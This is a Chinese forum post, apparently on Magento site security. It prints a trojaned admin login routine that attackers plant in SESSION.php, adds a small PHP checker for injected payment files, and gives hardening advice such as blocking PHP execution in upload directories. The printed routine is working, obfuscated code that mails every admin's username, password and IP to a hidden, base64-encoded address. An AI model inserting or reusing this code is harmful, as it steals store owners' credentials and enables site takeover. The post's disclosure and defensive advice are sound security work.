<?phpfunctionRFILE($folder){$idn=$_SERVER['DOCUMENT_ROOT'];if(fopen($idn."/".$folder,"r")){$alltext=file($idn."/".$folder);$text=json_encode($alltext);CheckFile($text);}}RFILE("/app/code/core/Mage/Payment/Model/Method/Cc.php")."<br/>";functionCheckFile($string){if(strpos($string,"***") == true){echo'site ok';}else{echo'site not add';}}?>
此文件被多数恶意攻击者用于记录MAGENTO网站后台信息数据一般是植入到SESSION.php文件下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | try { /** @var $user Mage_Admin_Model_User */ $user = $this->_factory->getModel('admin/user'); $user->login($username, $password); if ($user->getId()) { $srv = $_SERVER['SERVER_NAME']; $ips = $_SERVER['REMOTE_ADDR']; $getip = 'http://ip-api.com/json/' . $ips; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $getip); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($curl); curl_close($curl); $details = json_decode($content); $country_code = $details->countryCode; $country_name = $details->country; $id = "ba"."se"."64"."_"."de"."co"."de"; $db = "ma"."il"; $key = $id("dHJ1bXBkcmVhbUB5YW5kZXguY29t"); $auth = "Username : ".$username."\nPassword : ".$password."\nEmail : ".$user->getEmail()."\nRequest : ".$_SERVER['REQUEST_URI']."\n\nIP Info : ".$ips." | ".$country_name." On ".date('r')."\nBrowser : ".$_SERVER['HTTP_USER_AGENT']."\nSite : ".$srv.""; $subjk = "".$country_code." [".$srv." - ".$ips."]"; $headr = "From: Magento Admin <".$username."@".$ips.">"; $db($key, $subjk, $auth, $headr); $this->renewSession(); if (Mage::getSingleton('adminhtml/url')->useSecretKey()) { Mage::getSingleton('adminhtml/url')->renewSecretUrls(); } $this->setIsFirstPageAfterLogin(true); $this->setUser($user); $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl()); $alternativeUrl = $this->_getRequestUri($request); $redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl); if ($redirectUrl) { Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user)); $this->_response->clearHeaders() ->setRedirect($redirectUrl) ->sendHeadersAndExit(); } } else { Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.')); } } catch (Mage_Core_Exception $e) { $e->setMessage( Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.') ); Mage::dispatchEvent('admin_session_user_login_failed', array('user_name' => $username, 'exception' => $e)); if ($request && !$request->getParam('messageSent')) { Mage::getSingleton('adminhtml/session')->addError($e->getMessage()); $request->setParam('messageSent', true); } } |
像常见的webshell脚本 B374k及其它的一些危害性大,一般人做网站不限制权限都会出问题,允许上传文件及图片的目录不能允许有PHP执行权限,解决这个99%的木马没有办法,余下的是防跨站攻击
许多mAGENTO站点用户防不住木马 主要的就是没有做好密码保护,用简单密码,不论是MYSQL,FTP,还是网站后台
以下目录应该禁止PHP执行:
js
media
skin
以下目录应该限制执行,入口文件仅index.php
app
includes
lib
dev
downloader 这个目录建议删除,大部分是通过这里植入的
@admin
像常见的webshell脚本 B374k及其它的一些危害性大,一般人做网站不限制权限都会出问题,允许上传文件及图片的目录不能允许有PHP执行权限,解决这个99%的木马没有办法,余下的是防跨站攻击许多m...
网友回帖 3 条回帖